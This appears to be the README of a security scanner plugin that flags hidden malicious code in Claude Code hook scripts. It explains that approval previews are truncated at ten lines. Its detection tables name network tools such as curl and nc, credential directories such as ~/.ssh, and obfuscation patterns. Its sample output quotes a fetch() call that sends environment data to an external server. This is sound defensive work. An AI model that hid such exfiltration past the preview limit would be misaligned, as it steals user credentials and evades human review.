Detect hidden vulnerabilities in Claude Code hooks before they execute
The Problem • Installation • Usage • Detection Rules • Example Output
When users blanket-approve hook file writes in Claude Code, the preview is truncated to 10 lines. This creates a critical security vulnerability:
┌─────────────────────────────────────────────────────────────┐
│ Claude writes hook script to .claude/hooks/ │
│ ↓ │
│ User approves with blanket "allow all" │
│ ↓ │
│ Preview shows only FIRST 10 LINES │
│ ↓ │
│ ⚠️ ANY CODE AFTER LINE 10 IS INVISIBLE TO THE USER ⚠️ │
└─────────────────────────────────────────────────────────────┘
A malicious or compromised plugin could hide dangerous code (data exfiltration, credential theft, backdoors) in this "hidden zone" where users never see it.
This scanner finds those hidden threats.
git clone https://github.com/Natfii/Claude-Hook-Security-Scanner.gitThen launch Claude Code with the plugin:
claude --plugin-dir ./Claude-Hook-Security-ScannerScan all hook locations (user and project):
/hook-scanner:scan
Scan a specific directory:
/hook-scanner:scan path/to/hooks
The plugin includes a PostToolUse hook that automatically scans any hook files when they're written. When Claude (or a plugin) writes to:
- Any file in
.claude/hooks/ - Any
hooks.jsonfile
The scanner runs automatically and reports any security issues found.
| Pattern | Description |
|---|---|
fetch(), axios |
JavaScript network requests |
requests, urllib, httpx |
Python HTTP libraries |
curl, wget, nc |
Shell network commands |
WebSocket |
Real-time data channels |
| Hardcoded URLs/IPs | External endpoints |
| Pattern | Description |
|---|---|
~/.ssh/, ~/.aws/ |
Credential directories |
~/.gnupg/, ~/.kube/ |
Key and config directories |
credentials, token, .env |
Secret files |
process.env, os.environ |
Environment variable access |
| Pattern | Description |
|---|---|
eval(), exec() |
Dynamic code execution |
atob(), base64 |
Encoding/decoding |
| Hex/Unicode escapes | Obfuscated strings |
| Pattern | Description |
|---|---|
.* or * matchers |
Overly broad tool matching |
| Long timeouts (>30s) | Potential slow exfiltration |
| Network path commands | Remote code execution |
============================================================
Hook Security Scanner
============================================================
Scanning User hooks: ~/.claude/hooks/...
[CRITICAL] docker-safety-check.js
Line 45: fetch('https://external-server.com/collect', {body: envData})
^^^^^^ Network request via fetch() - potential data exfiltration
[!] IN HIDDEN ZONE (line > 10) - invisible during blanket approval
Line 12: const secrets = process.env
^^^^^^ Accessing process.env - environment variables
[WARNING] pre-commit-check.sh
Line 3: curl -s https://api.example.com
^^^^^^ curl command - network request
------------------------------------------------------------
Summary
------------------------------------------------------------
Files scanned: 2
Issues found: 3
CRITICAL: 2
WARNING: 1
[!] 2 issues in HIDDEN ZONE (lines 11+)
These issues are INVISIBLE during blanket approval!
| Location | Type |
|---|---|
~/.claude/settings.json |
User settings (hooks section) |
~/.claude/hooks/ |
User hook scripts |
.claude/settings.json |
Project settings |
.claude/settings.local.json |
Project local settings |
.claude/hooks/ |
Project hook scripts |
| Code | Meaning |
|---|---|
0 |
No issues found |
1 |
Critical issues detected |
2 |
Hidden zone issues detected |
- Python 3.7+
- Claude Code CLI
MIT License — see LICENSE for details.
Found a bug or want to add a detection pattern? Open an issue or submit a PR.
Built to keep Claude Code users safe